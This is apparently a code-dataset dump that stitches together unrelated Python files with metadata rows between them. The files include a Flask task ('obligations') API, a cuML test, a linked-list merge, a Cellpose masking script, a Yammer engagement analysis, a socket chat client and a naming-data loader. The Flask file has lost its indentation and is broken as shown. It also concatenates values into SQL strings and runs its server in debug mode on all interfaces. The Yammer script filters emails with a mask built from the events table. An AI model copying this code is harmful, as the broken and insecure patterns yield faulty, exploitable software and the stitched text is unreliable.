def get_obligation(obligation_id):
logging.debug('Attempting to GET obligation ' + str(obligation_id))
row = "";
response_code = None
    #execute query and get all rows that match (since obligation_id is unique there will be 0 or 1)
db_connection, db_cursor = get_db()
my_query = "select * from " + applicationInfo.OBLIGATION_TABLE_NAME + " where " + applicationInfo.OBLIGATION_ID_NAME + " = " + str(obligation_id)
row = db_cursor.execute(my_query).fetchall()
if (len(row) > 0):
row = row[0]
data = {
'obligationid' : row[row_pos_obligationid], #obligationid
'userid' : row[row_pos_userid], #userid
'name' : row[row_pos_name], #name
'description' : row[row_pos_description], #description
'starttime' : row[row_pos_starttime], #starttime
'endtime' : row[row_pos_endtime], #endtime
'priority' : row[row_pos_priority], #priority
'status' : row[row_pos_status], #status
'category' : row[row_pos_category]} #category
data = json.dumps(data)
response_code = 200
logging.debug('Obligation ' + str(obligation_id) + ' was found')
else:
data = jsonify({'error': 1})
response_code = 404
logging.debug('Obligation ' + str(obligation_id) + ' could not be found')
return data, response_code
@app.route('/obligations', methods = ['POST'])
def create_obligation():
logging.debug('Attempting to create a new Obligation')
db_connection, db_cursor = get_db()
response = ""
response_code = None
user_id = request.form['userid']
name = request.form['name']
description = request.form['description']
start_time = request.form['starttime']
end_time = request.form['endtime']
priority = request.form['priority']
status = request.form['status']
category = request.form['category']
try:
db_cursor.execute("insert into " + applicationInfo.OBLIGATION_TABLE_NAME + " (obligationid, userid, name, description, starttime, endtime, priority, status, category) values (?, ?, ?, ?, ?, ?, ?, ?, ?)", (None, user_id, name, description, start_time, end_time, priority, status, category))
#get the inserted obligations id so that it can be returned
result = db_cursor.execute("select last_insert_rowid() FROM " + applicationInfo.OBLIGATION_TABLE_NAME).fetchall()
if (len(result) > 0):
result = result[0]
obligation_id = result[0]
db_connection.commit()
response = jsonify({'obligation_id': obligation_id, 'result': "successfully added:" + name})
response_code = 200
logging.debug('Creation of obligation ' + str(obligation_id) + ' was a success')
    except Exception as e:
logging.error('Obligation could not be created. Error message: ' + str(e))
response = jsonify({'error': str(e)})
response_code = 400
return response
@app.route('/obligations/<int:obligation_id>', methods = ['POST'])
def modify_obligation(obligation_id):
logging.debug('attempting to edit obligation: ' + str(obligation_id))
logging.debug('incoming update data: ' + str(request.form))
db_connection, db_cursor = get_db()
response = ""
response_code = None
try:
my_query = "select * from " + applicationInfo.OBLIGATION_TABLE_NAME + " where " + applicationInfo.OBLIGATION_ID_NAME + "=" + str(obligation_id)
row = db_cursor.execute(my_query).fetchall()
if (len(row) > 0):
row = row[0]
keys = request.form.keys()
if 'userid' in keys:
user_id = request.form['userid']
else:
user_id = row[row_pos_userid]
if 'name' in keys:
name = request.form['name']
else:
name = row[row_pos_name]
if 'description' in keys:
description = request.form['description']
else:
description = row[row_pos_description]
if 'starttime' in keys:
start_time = request.form['starttime']
else:
start_time = row[row_pos_starttime]
if 'endtime' in keys:
end_time = request.form['endtime']
else:
end_time = row[row_pos_endtime]
if 'priority' in keys:
priority = request.form['priority']
else:
priority = row[row_pos_priority]
if 'status' in keys:
status = request.form['status']
else:
status = row[row_pos_status]
if 'category' in keys:
category = request.form['category']
else:
category = row[row_pos_category]
db_cursor.execute("update " + applicationInfo.OBLIGATION_TABLE_NAME + " set userid=?, name=?, description=?, starttime=?, endtime=?, priority=?, status=?, category=? where obligationid = ?", (user_id, name, description, start_time, end_time, priority, status, category, obligation_id))
db_connection.commit()
response_code = 200
            logging.debug('Obligation was updated and committed to the db')
else:
logging.debug('Obligation ' + str(obligation_id) + ' could not be found or does not exist')
response = jsonify({'error': '404 - No such obligation id'})
response_code = 404
    except Exception as e:
response = jsonify({'error': str(e)})
response_code = 500
        logging.error('An error occurred while trying to update obligation ' + str(obligation_id) + '. Error message: ' + str(e))
return response, response_code
@app.route('/obligations/<int:obligation_id>', methods = ['DELETE'])
def delete_obligation(obligation_id):
logging.debug('Attempting to DELETE obligation ' + str(obligation_id))
db_connection, db_cursor = get_db()
response = ""
response_code = None
try:
        if isinstance(obligation_id, int):
my_query = "select * from " + applicationInfo.OBLIGATION_TABLE_NAME + " where " + applicationInfo.OBLIGATION_ID_NAME + "=" + str(obligation_id)
row = db_cursor.execute(my_query).fetchall()
if (len(row) > 0):
db_cursor.execute("delete from " + applicationInfo.OBLIGATION_TABLE_NAME + " where " + applicationInfo.OBLIGATION_ID_NAME + "=" + str(obligation_id))
db_connection.commit()
response = jsonify({'success': 'OK successfully deleted'})
response_code = 200
else:
response = jsonify({'error': 'No such obligation id'})
response_code = 404
else:
response = jsonify({'error': 'Bad Request - Info not properly provided'})
response_code = 400
    except Exception as e:
logging.error('Could not delete obligation ' + str(obligation_id) + '. Error message: ' + str(e))
response = jsonify({'error': str(e)})
response_code = 500
return response, response_code
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0', port=int('5000'))
| 39.475836 | 297 | 0.617384 | 0 | 0 | 0 | 0 | 9,861 | 0.928619 | 0 | 0 | 2,469 | 0.232508 |
a8247bed0a1cb5051fa0d35c0fab64fca16aa20d | 1,396 | py | Python | python/cuML/test/test_dbscan.py | rongou/cuml | 9fbd7187ccf7ee7457c55b768ebd8ea86dbe2bec | ["Apache-2.0"] | null | null | null | python/cuML/test/test_dbscan.py | rongou/cuml | 9fbd7187ccf7ee7457c55b768ebd8ea86dbe2bec | ["Apache-2.0"] | null | null | null | python/cuML/test/test_dbscan.py | rongou/cuml | 9fbd7187ccf7ee7457c55b768ebd8ea86dbe2bec | ["Apache-2.0"] | null | null | null |
# Copyright (c) 2018, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from cuml import DBSCAN as cuDBSCAN
from sklearn.cluster import DBSCAN as skDBSCAN
from test_utils import array_equal
import cudf
import numpy as np
@pytest.mark.parametrize('datatype', [np.float32, np.float64])
def test_dbscan_predict(datatype):
gdf = cudf.DataFrame()
gdf['0']=np.asarray([1,2,2,8,8,25],dtype=datatype)
gdf['1']=np.asarray([2,2,3,7,8,80],dtype=datatype)
X = np.array([[1, 2], [2, 2], [2, 3], [8, 7], [8, 8], [25, 80]], dtype = datatype)
print("Calling fit_predict")
cudbscan = cuDBSCAN(eps = 3, min_samples = 2)
cu_labels = cudbscan.fit_predict(gdf)
skdbscan = skDBSCAN(eps = 3, min_samples = 2)
sk_labels = skdbscan.fit_predict(X)
print(X.shape[0])
for i in range(X.shape[0]):
assert cu_labels[i] == sk_labels[i]
| 32.465116 | 86 | 0.703438 | 0 | 0 | 0 | 0 | 637 | 0.456304 | 0 | 0 | 613 | 0.439112 |
a827531247ffd24ded530b9e0dea0c181d142c7b | 114 | py | Python | math_and_algorithm/024.py | tonko2/AtCoder | 5d617072517881d226d7c8af09cb88684d41af7e | ["Xnet", "X11", "CECILL-B"] | 2 | 2022-01-22T07:56:58.000Z | 2022-01-24T00:29:37.000Z | math_and_algorithm/024.py | tonko2/AtCoder | 5d617072517881d226d7c8af09cb88684d41af7e | ["Xnet", "X11", "CECILL-B"] | null | null | null | math_and_algorithm/024.py | tonko2/AtCoder | 5d617072517881d226d7c8af09cb88684d41af7e | ["Xnet", "X11", "CECILL-B"] | null | null | null |
N = int(input())
ans = 0
for _ in range(N):
p, q = map(int, input().split())
ans += (1 / p) * q
print(ans)
| 19 | 36 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
a8276b0d3215a9fe2604eec700ad87c77dc2f29b | 769 | py | Python | LeetCode/0023_merge_k_sorted_lists.py | KanegaeGabriel/ye-olde-interview-prep-grind | 868362872523a5688f49ab48efb09c3008e0db4d | ["MIT"] | 1 | 2020-05-13T19:16:23.000Z | 2020-05-13T19:16:23.000Z | LeetCode/0023_merge_k_sorted_lists.py | KanegaeGabriel/ye-olde-interview-prep-grind | 868362872523a5688f49ab48efb09c3008e0db4d | ["MIT"] | null | null | null | LeetCode/0023_merge_k_sorted_lists.py | KanegaeGabriel/ye-olde-interview-prep-grind | 868362872523a5688f49ab48efb09c3008e0db4d | ["MIT"] | null | null | null |
from heapq import heappush, heappop
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def __lt__(self, other):
return self.val < other.val
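# k-way merge with a min-heap: __lt__ above lets heapq compare ListNodes
# directly; repeatedly pop the smallest head and push its successor.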
def mergeKLists(lists):
result = ListNode(-1)
p = result
heap = []
for l in lists:
if l: heappush(heap, l)
while heap:
cur = heappop(heap)
if cur.next: heappush(heap, cur.next)
p.next = cur
p = p.next
return result.next
l1 = ListNode(1)
l1.next = ListNode(4)
l1.next.next = ListNode(5)
l2 = ListNode(1)
l2.next = ListNode(3)
l2.next.next = ListNode(4)
l3 = ListNode(2)
l3.next = ListNode(6)
l3 = mergeKLists([l1, l2, l3])
p = l3
while p:
print(p.val, end=" ") # 1 1 2 3 4 4 5 6
p = p.next
print()
| 17.477273 | 45 | 0.579974 | 154 | 0.20026 | 0 | 0 | 0 | 0 | 0 | 0 | 20 | 0.026008 |
a8281ad0fab5136b54ef02f2bff2a74dd9aaaf90 | 166 | py | Python | archiver/utils.py | jenrik/archiver | b9e10661d6a79b745796b248c35287db232da8ff | ["BSD-3-Clause"] | null | null | null | archiver/utils.py | jenrik/archiver | b9e10661d6a79b745796b248c35287db232da8ff | ["BSD-3-Clause"] | null | null | null | archiver/utils.py | jenrik/archiver | b9e10661d6a79b745796b248c35287db232da8ff | ["BSD-3-Clause"] | null | null | null |
def archive_link(link):
    # Create a snapshot of the link on the internet archive
    # Ref: https://archive.readme.io/docs/creating-a-snapshot
    # Minimal sketch, assuming the `requests` package: fetching the
    # Wayback Machine's save endpoint triggers a snapshot of the page.
    import requests
    response = requests.get("https://web.archive.org/save/" + link)
    response.raise_for_status()
| 27.666667 | 61 | 0.692771 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 118 | 0.710843 |
a82a766dd5a8919e5aec354cbe63b71c9cd59549 | 2,297 | py | Python | source/cell_mask/cell_mask.py | zhanyinx/SPT_analysis | 1cf806c1fd6051e7fc998d2860a16bea6aa9de1a | ["MIT"] | 1 | 2021-07-09T11:51:04.000Z | 2021-07-09T11:51:04.000Z | source/cell_mask/cell_mask.py | zhanyinx/SPT_analysis | 1cf806c1fd6051e7fc998d2860a16bea6aa9de1a | ["MIT"] | null | null | null | source/cell_mask/cell_mask.py | zhanyinx/SPT_analysis | 1cf806c1fd6051e7fc998d2860a16bea6aa9de1a | ["MIT"] | null | null | null |
import argparse
import glob
import numpy as np
import os
import skimage.io
import torch
import tifffile
from cellpose import models
def _parse_args():
"""Parse command-line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--input",
type=str,
default=None,
required=True,
help="Input image or folder with images to mask.",
)
parser.add_argument(
"-o",
"--output",
type=str,
default=None,
required=False,
help="Output folder, default mask within input folder",
)
parser.add_argument(
"-t",
"--target",
type=str,
default=None,
required=False,
help="Target channel tag, if provided, it will look for files with the tag.",
)
args = parser.parse_args()
return args
def main():
"""Create cell masks and save them into mask folder within input folder."""
args = _parse_args()
if os.path.isdir(args.input):
inputs = glob.glob(f"{args.input}/*tif")
elif os.path.isfile(args.input):
inputs = [args.input]
else:
raise ValueError(f"Expected input folder or file. Provided {args.input}.")
if args.target is not None:
inputs = [x for x in inputs if args.target in x]
output = args.output
if output is None:
output = f"{os.path.abspath(args.input)}/mask"
if not os.path.exists(output):
os.mkdir(output)
cellpose_model = models.Cellpose(model_type="cyto", gpu=False)
for input_file in inputs:
img = skimage.io.imread(input_file)
middle_slice = len(img) // 2
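        # 4D stacks are max-projected along axis 1 and segmented at the middle
        # slice of axis 0; 3D stacks are segmented at the middle slice directly
        # (axis ordering assumed from the code, not documented here).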
if len(img.shape) == 4:
mask_nucl, *_ = cellpose_model.eval(
[np.max(img, axis=1)[middle_slice]],
diameter=150,
channels=[0, 0],
min_size=15,
)
if len(img.shape) == 3:
mask_nucl, *_ = cellpose_model.eval(
[img[middle_slice]],
diameter=150,
channels=[0, 0],
min_size=15,
)
name = os.path.basename(input_file)
out = f"{output}/{name}"
tifffile.imsave(out, mask_nucl[0])
if __name__ == "__main__":
main()
| 25.241758 | 85 | 0.562908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 462 | 0.201132 |
a82b6067d87e3c320c8e0fb55b9b998dccade592 | 14,134 | py | Python | 02-customer-cliff-dive/python/emery_leslie.py | leslem/insight-data-challenges | 14c56d30663d7fef178b820d2128dbf4782c1200 | ["MIT"] | null | null | null | 02-customer-cliff-dive/python/emery_leslie.py | leslem/insight-data-challenges | 14c56d30663d7fef178b820d2128dbf4782c1200 | ["MIT"] | 1 | 2021-06-08T02:43:08.000Z | 2021-06-08T03:05:21.000Z | 02-customer-cliff-dive/python/emery_leslie.py | leslem/insight-data-challenges | 14c56d30663d7fef178b820d2128dbf4782c1200 | ["MIT"] | null | null | null |
# # Customer cliff dive data challenge
# 2020-02-17
# Leslie Emery
# ## Summary
# ### The problem
# The head of the Yammer product team has noticed a precipitous drop in weekly active users, which is one of the main KPIs for customer engagement. What has caused this drop?
# ### My approach and results
# I began by coming up with several questions to investigate:
# - Was there any change in the way that weekly active users is calculated?
# - This does not appear to be the case. To investigate this, I began by replicating the figure from the dashboard. I calculated a rolling 7-day count of engaged users, making sure to use the same method across the entire time frame covered by the dataset, and it still showed the same drop in engagement.
# - Was there a change in any one particular type of "engagement"?
# - I looked at a rolling 7-day count of each individual type of engagement action. From plotting all of these subplots, it looks to me like home_page, like_message, login, send_message, and view_inbox are all exhibiting a similar drop around the same time, so it's these underlying events that are driving the drop.
# - Could a change in the user interface be making it more difficult or less pleasant for users?
# - I couldn't find information in the available datasets to address this question. The `yammer_experiments` data set has information about experiments going on, presumably in the user interface. All of the listed experiments happened in June of 2014, though, which I think is too early to have caused the August drop in engagement.
# - Is this drop a seasonal change that happens around this time every year?
# - Because the data is only available for the period of time shown in the original dashboard, I can't investigate this question. I'd be very interested to see if there is a pattern of reduced engagement at the end of the summer, perhaps related to vacation or school schedules.
# - Are users visiting the site less because they're getting more content via email?
# - I calculated 7-day rolling counts of each type of email event, and all email events together. Email events overall went up during the time period immediately before the drop in user engagement. All four types of email events increased during the same period, indicating higher clickthroughs on emails, higher numbers of email open events, and more reengagement and weekly digest emails sent. It could be that the higher number of weekly digests sent out mean that users don't have to visit the site directly as much.
# - Are users disengaging from the site due to too many emails/notifications?
# - I calculated a rolling 7-day count of emails sent to each user and found that the number of emails sent to each user per 7-day period has increased from 5.4 emails (July 20) to 7.75 emails (August 11). This suggests that an increasing volume of emails sent to individual users could have driven them away from using the site. To investigate this further I would want to look into email unsubscribe rates. If unsubscribe rates have also gone up, then it seems that Yammer is sending too many emails to its users.
# - To investigate whether the number of emails sent per user is correlated with the number of engaged users, I used a Granger causality test to see if "emails sent per user" could be used to predict "number of engaged users". With a high enough lag, the test statistics might be starting to become significant, but I would want to investigate these test results further before making any recommendations based on them.
# - Is the drop in engagement due to a decrease in new activated users? e.g. they are reaching the end of potential customer base?
# - I calculated the cumulative number of newly activated users over time, using the activation time for each user in the users table. I wanted to see if customer growth had leveled off. However, I saw that customer growth was still increasing in the same pattern. This was true when using creating date rather than activation date as well.
# What is my recommendation to Yammer?
# I have a few recommendations to Yammer:
# - Try decreasing the number of emails sent to each individual user to see if this increases engagement. They could try this for a subset of users first.
# - Investigate email unsubscribe rates to see if they are going up. This would indicate that increased email volume might be making users unhappy.
# - Compare this data to a wider time range to see if the drop shown here is seasonal.
# +
import matplotlib.pyplot as plt
import numpy as np
import os
import plotly.express as px
import pandas as pd
from scipy import stats
from statsmodels.tsa.stattools import acf, pacf
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
from statsmodels.tsa.stattools import grangercausalitytests
# -
data_dir = '/Users/leslie/devel/insight-data-challenges/02-customer-cliff-dive/data'
benn_normal = pd.read_csv(os.path.join(data_dir, 'benn.normal_distribution - benn.normal_distribution.csv.tsv'), sep='\t')
rollup_periods = pd.read_csv(os.path.join(data_dir, 'dimension_rollup_periods - dimension_rollup_periods.csv.tsv'), sep='\t',
parse_dates=['time_id', 'pst_start', 'pst_end', 'utc_start', 'utc_end'])
yammer_emails = pd.read_csv(os.path.join(data_dir, 'yammer_emails - yammer_emails.csv.tsv'), sep='\t',
parse_dates=['occurred_at'])
yammer_events = pd.read_csv(os.path.join(data_dir, 'yammer_events - yammer_events.csv.tsv'), sep='\t',
parse_dates=['occurred_at'])
yammer_experiments = pd.read_csv(os.path.join(data_dir, 'yammer_experiments - yammer_experiments.csv.tsv'), sep='\t',
parse_dates=['occurred_at'])
yammer_users = pd.read_csv(os.path.join(data_dir, 'yammer_users - yammer_users.csv.tsv'), sep='\t',
parse_dates=['created_at', 'activated_at'])
# +
benn_normal.info()
benn_normal.head()
benn_normal.describe()
rollup_periods.info()
rollup_periods.head()
rollup_periods.describe()
yammer_emails.info()
yammer_emails.head()
yammer_emails.describe()
yammer_emails['action'].value_counts(dropna=False)
yammer_emails['user_type'].value_counts(dropna=False)
yammer_events.info()
yammer_events.head()
yammer_events.describe()
yammer_events['occurred_at']
yammer_events['event_type'].value_counts(dropna=False)
yammer_events['event_name'].value_counts(dropna=False)
yammer_events['location'].value_counts(dropna=False)
yammer_events['device'].value_counts(dropna=False)
yammer_events['user_type'].value_counts(dropna=False)
yammer_events['user_type'].dtype
# user_type should be an int, but has many missing values, and NaN is a float.
# So convert it to the Pandas Int64 dtype which can accommodate NaNs and ints.
yammer_events = yammer_events.astype({'user_type': 'Int64'})
yammer_experiments.info()
yammer_experiments.head()
yammer_experiments.describe()
yammer_experiments['experiment'].value_counts(dropna=False)
yammer_experiments['experiment_group'].value_counts(dropna=False)
yammer_experiments['location'].value_counts(dropna=False)
yammer_experiments['device'].value_counts(dropna=False)
yammer_users.info()
yammer_users.head()
yammer_users.describe()
yammer_users['language'].value_counts(dropna=False)
yammer_users['state'].value_counts(dropna=False)
yammer_users['company_id'].value_counts(dropna=False)
# -
# ## Initial data investigation
# +
# How many days in the dataset?
yammer_events['occurred_at'].max() - yammer_events['occurred_at'].min()
# 122 days!
rollup_periods['pst_start'].max() - rollup_periods['pst_end'].min()
# 1094 days - way more intervals than needed to tile this events data!
yammer_events = yammer_events.sort_values(by='occurred_at', ascending=True)
small_events = yammer_events.head(int(yammer_events.shape[0]/10)).sample(n=40)
small_events = small_events.sort_values(by='occurred_at', ascending=True)
small_events['occurred_at'].max() - small_events['occurred_at'].min()
weekly_rollup_periods = rollup_periods.loc[rollup_periods['period_id'] == 1007]
# -
# +
small_rolling_engagement = small_events.loc[small_events['event_type'] == 'engagement'].rolling(
'7D', on='occurred_at').count()
# I'm not sure whether rollup_periods are closed on right, left, or both...
# Calculate counts of engagement events in a 7-day rolling window
rolling_engagement_counts = yammer_events.loc[yammer_events['event_type'] == 'engagement'].sort_values(
by='occurred_at', ascending=True # Have to sort by "on" column to use rolling()
).rolling('7D', on='occurred_at', min_periods=1).count()
# +
# Use a loop to aggregate on rollup periods
yammer_events['event_name'].unique()
event_range = [min(yammer_events['occurred_at']), max(yammer_events['occurred_at'])]
covered_weekly_rollup_periods = weekly_rollup_periods.loc[(weekly_rollup_periods['pst_end'] <= event_range[1])
& (weekly_rollup_periods['pst_start'] >= event_range[0])]
# in interval --> start < occurred_at <= end
counts_by_type = None
for (ridx, row) in covered_weekly_rollup_periods.iterrows():
# row = covered_weekly_rollup_periods.iloc[0]
# Get egagement events within the period
df = yammer_events.loc[(yammer_events['occurred_at'] > row['pst_start'])
& (yammer_events['occurred_at'] <= row['pst_end'])
& (yammer_events['event_type'] == 'engagement')]
# Count user engagement events
cbt = df.groupby('event_name').aggregate(event_count=('user_id', 'count')).transpose()
cbt['pst_start'] = row['pst_start']
cbt['pst_end'] = row['pst_end']
cbt['engaged_users'] = df['user_id'].nunique()
cbt['engagement_event_count'] = df.shape[0]
if counts_by_type is None:
counts_by_type = cbt
else:
counts_by_type = counts_by_type.append(cbt)
counts_by_type
# +
# Plot engaged users over time
fig = px.scatter(counts_by_type, x='pst_end', y='engaged_users', template='plotly_white')
fig.update_yaxes(range=[0, 1500])
fig.show()
# Plot count of engagement_events over time
fig = px.scatter(counts_by_type, x='pst_end', y='engagement_event_count', template='plotly_white')
fig.show()
# Plot count of individual event types over time
counts_melted = counts_by_type.melt(id_vars=['pst_start', 'pst_end', 'engaged_users', 'engagement_event_count'])
fig = px.scatter(counts_melted, x='pst_end', y='value', template='plotly_white',
facet_col='event_name', facet_col_wrap=3, height=1200)
fig.update_yaxes(matches=None)
fig.show()
# -
# Are there any "experiments" messing things up?
yammer_experiments['occurred_at'].describe()
# No, these are all before the issue shows up
# +
# Investigate the sending of emails to user in the same rollup periods
email_counts_by_type = None
for (ridx, row) in covered_weekly_rollup_periods.iterrows():
# row = covered_weekly_rollup_periods.iloc[0]
# Get egagement events within the period
df = yammer_emails.loc[(yammer_events['occurred_at'] > row['pst_start'])
& (yammer_events['occurred_at'] <= row['pst_end'])]
# Count user engagement events
cbt = df.groupby('action').aggregate(action_count=('user_id', 'count')).transpose()
cbt['pst_start'] = row['pst_start']
cbt['pst_end'] = row['pst_end']
cbt['emailed_users'] = df['user_id'].nunique()
cbt['email_event_count'] = df.shape[0]
cbt['emails_sent_per_user'] = df.loc[df['action'].str.startswith('sent_')].groupby(
'user_id').count().mean()['user_type']
if email_counts_by_type is None:
email_counts_by_type = cbt
else:
email_counts_by_type = email_counts_by_type.append(cbt)
email_counts_by_type
# +
# Plot emailed users over time
fig = px.scatter(email_counts_by_type, x='pst_end', y='emailed_users', template='plotly_white')
fig.update_yaxes(range=[0, 1500])
fig.show()
# Plot count of email events over time
fig = px.scatter(email_counts_by_type, x='pst_end', y='email_event_count', template='plotly_white')
fig.show()
# Plot count of individual email types over time
email_counts_melted = email_counts_by_type.melt(id_vars=[
'pst_start', 'pst_end', 'emailed_users', 'email_event_count', 'emails_sent_per_user'])
fig = px.scatter(email_counts_melted, x='pst_end', y='value', template='plotly_white',
facet_col='action', facet_col_wrap=2)
fig.update_yaxes(matches=None)
fig.show()
# -
# +
# What is email engagement event count per user? Did that increase?
# +
fig = px.scatter(email_counts_by_type, x='pst_start', y='emails_sent_per_user', template='plotly_white')
fig.show()
p, r = stats.pearsonr(email_counts_by_type['emails_sent_per_user'].to_numpy(),
counts_by_type['engaged_users'].to_numpy())
# They do look moderately correlated, but how do I test that one has an effect on the other?
# -
acf_50 = acf(counts_by_type['engaged_users'], nlags=50, fft=True)
pacf_50 = pacf(counts_by_type['engaged_users'], nlags=50)
fig, axes = plt.subplots(1, 2, figsize=(16, 3), dpi=200)
plot_acf(counts_by_type['engaged_users'].tolist(), lags=50, ax=axes[0])
plot_pacf(counts_by_type['engaged_users'].tolist(), lags=50, ax=axes[1])
plt.show()
test_df = pd.DataFrame({'emails_sent_per_user': email_counts_by_type['emails_sent_per_user'].to_numpy(),
'engaged_users': counts_by_type['engaged_users'].to_numpy()})
lags = range(20)
caus_test = grangercausalitytests(test_df, maxlag=lags)
# Has there been a dropoff in new users?
# +
yammer_users = yammer_users.sort_values(by='created_at', ascending=True)
yammer_users['cumulative_users'] = pd.Series(np.ones(yammer_users.shape[0]).cumsum())
fig = px.scatter(yammer_users, x='created_at', y='cumulative_users', template='plotly_white')
fig.show()
# Nope, growth is still practicially exponenital
yammer_users['cumulative_activated_users'] = pd.Series(np.ones(yammer_users.shape[0]).cumsum())
fig = px.scatter(yammer_users, x='created_at', y='cumulative_activated_users', template='plotly_white')
fig.show()
yammer_users['company_id'].nunique()
# -
| 51.963235 | 524 | 0.743809 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,119 | 0.57443 |
a82ba74fc6af916b17675886faaf3aad6278c7c2 | 796 | py | Python | students/K33402/laboratory_works/Ermakova_Anna/laboratory_work_1/task_4/client.py | ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021 | bb91c91a56d21cec2b12ae4cc722eaa652a88420 | [
"MIT"
]
| 4 | 2020-09-03T15:41:42.000Z | 2021-12-24T15:28:20.000Z | students/K33402/laboratory_works/Ermakova_Anna/laboratory_work_1/task_4/client.py | ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021 | bb91c91a56d21cec2b12ae4cc722eaa652a88420 | [
"MIT"
]
| 48 | 2020-09-13T20:22:42.000Z | 2021-04-30T11:13:30.000Z | students/K33402/laboratory_works/Ermakova_Anna/laboratory_work_1/task_4/client.py | ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021 | bb91c91a56d21cec2b12ae4cc722eaa652a88420 | [
"MIT"
]
| 69 | 2020-09-06T10:32:37.000Z | 2021-11-28T18:13:17.000Z | import socket
import threading
import random
def send_message():
try:
while True:
msg = input()
sock.send(bytes(name + ": " + msg, 'utf-8'))
if msg == '\leave chat':
sock.close()
break
except Exception:
pass
finally:
print('You left chat.')
def receive_message():
try:
while True:
data = sock.recv(1024).decode('utf-8')
if not data:
break
print(data)
sock.close()
except Exception:
pass
sock = socket.socket()
sock.connect(('localhost', 9090))
number = random.randint(0,1000)
name = "person" + str(number)
threading.Thread(target=send_message).start()
threading.Thread(target=receive_message).start()
| 20.410256 | 56 | 0.548995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 66 | 0.082915 |
a82c200cd117a48cc9a2ebacd146f50b56baabcf | 23,587 | py | Python | convolutional_attention/token_naming_data.py | s1530129650/convolutional-attention | 8839da8146962879bb419a61253e7cf1b684fb22 | [
"BSD-3-Clause"
]
| 128 | 2016-05-10T01:38:27.000Z | 2022-02-04T07:14:12.000Z | convolutional_attention/token_naming_data.py | s1530129650/convolutional-attention | 8839da8146962879bb419a61253e7cf1b684fb22 | [
"BSD-3-Clause"
]
| 6 | 2016-07-19T09:27:47.000Z | 2021-07-08T21:22:32.000Z | convolutional_attention/token_naming_data.py | s1530129650/convolutional-attention | 8839da8146962879bb419a61253e7cf1b684fb22 | [
"BSD-3-Clause"
]
| 36 | 2016-05-11T08:57:26.000Z | 2021-07-07T02:37:07.000Z | from collections import defaultdict
import heapq
from itertools import chain, repeat
from feature_dict import FeatureDictionary
import json
import numpy as np
import scipy.sparse as sp
class TokenCodeNamingData:
SUBTOKEN_START = "%START%"
SUBTOKEN_END = "%END%"
NONE = "%NONE%"
@staticmethod
def __get_file_data(input_file):
with open(input_file, 'r') as f:
data = json.load(f)
# data=[{"tokens":"hello world I am OK".split(),"name":"hello world you".split()}]*4
# data+=[{"tokens":"just another test of a silly program".split(),"name":"who knows".split()}]*4
names = []
original_names = []
code = []
for entry in data:
# skip entries with no relevant data (this will crash the code)
if len(entry["tokens"]) == 0 or len(entry["name"]) == 0:
continue
code.append(TokenCodeNamingData.remove_identifiers_markers(entry["tokens"]))
original_names.append(",".join(entry["name"]))
subtokens = entry["name"]
names.append([TokenCodeNamingData.SUBTOKEN_START] + subtokens + [TokenCodeNamingData.SUBTOKEN_END])
return names, code, original_names
def __init__(self, names, code):
self.name_dictionary = FeatureDictionary.get_feature_dictionary_for(chain.from_iterable(names), 2)
self.name_dictionary.add_or_get_id(self.NONE)
self.all_tokens_dictionary = FeatureDictionary.get_feature_dictionary_for(chain.from_iterable(
[chain.from_iterable(code), chain.from_iterable(names)]), 5)
self.all_tokens_dictionary.add_or_get_id(self.NONE)
self.name_empirical_dist = self.__get_empirical_distribution(self.all_tokens_dictionary, chain.from_iterable(names))
@staticmethod
def __get_empirical_distribution(element_dict, elements, dirichlet_alpha=10.):
"""
Retrive te empirical distribution of tokens
:param element_dict: a dictionary that can convert the elements to their respective ids.
:param elements: an iterable of all the elements
:return:
"""
targets = np.array([element_dict.get_id_or_unk(t) for t in elements])
empirical_distribution = np.bincount(targets, minlength=len(element_dict)).astype(float)
empirical_distribution += dirichlet_alpha / len(empirical_distribution)
return empirical_distribution / (np.sum(empirical_distribution) + dirichlet_alpha)
def __get_in_lbl_format(self, data, dictionary, cx_size):
targets = []
contexts = []
ids = []
for i, sequence in enumerate(data):
for j in xrange(1, len(sequence)): # First element should always be predictable (ie sentence start)
ids.append(i)
targets.append(dictionary.get_id_or_unk(sequence[j]))
context = sequence[:j]
if len(context) < cx_size:
context = [self.NONE] * (cx_size - len(context)) + context
else:
context = context[-cx_size:]
assert len(context) == cx_size, (len(context), cx_size,)
contexts.append([dictionary.get_id_or_unk(t) for t in context])
return np.array(targets, dtype=np.int32), np.array(contexts, dtype=np.int32), np.array(ids, np.int32)
def get_data_in_lbl_format(self, input_file, code_cx_size, names_cx_size):
names, code, original_names = self.__get_file_data(input_file)
return self.__get_in_lbl_format(names, self.name_dictionary, names_cx_size), \
self.__get_in_lbl_format(code, self.all_tokens_dictionary, code_cx_size), original_names
@staticmethod
def get_data_in_lbl_format_with_validation(input_file, code_cx_size, names_cx_size, pct_train):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
original_names = np.array(original_names, dtype=np.object)
lim = int(pct_train * len(names))
naming = TokenCodeNamingData(names[:lim], code[:lim])
return naming.__get_in_lbl_format(names[:lim], naming.name_dictionary, names_cx_size), \
naming.__get_in_lbl_format(code[:lim], naming.all_tokens_dictionary, code_cx_size), original_names[:lim], \
naming.__get_in_lbl_format(names[lim:], naming.name_dictionary, names_cx_size), \
naming.__get_in_lbl_format(code[lim:], naming.all_tokens_dictionary, code_cx_size), original_names[lim:], naming
@staticmethod
